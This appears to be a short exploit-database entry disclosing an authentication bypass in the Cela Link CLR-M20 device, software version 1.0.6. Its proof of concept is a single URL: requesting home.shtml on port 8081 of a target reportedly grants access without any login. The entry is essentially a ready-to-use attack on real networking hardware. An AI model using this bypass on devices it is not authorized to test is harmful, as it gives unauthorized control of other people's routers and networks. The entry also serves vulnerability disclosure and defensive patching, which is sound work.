Cela Link CLR-M20 version 1.0.6 suffers from an authentication bypass vulnerability.
6e8f4c32eac1413aaec524cf8aba7699b11585b4f2405329e36d754a231e3d5d
# Exploit Title: Cela Link CLR-M20 sw version 1.0.6 - Authentication Bypass
# Date: 2018-12-27
# Exploit Author: Mr Winst0n
# Software Link: https://www.celalink.com
# Version: 1.0.6
# Authentication Required: No
# Tested on: Linux
# This vulnerability allows attackers to login without enter any information
# PoC:
# You should only add "home.shtml" to main link address
https://target_ip:8081/home.shtml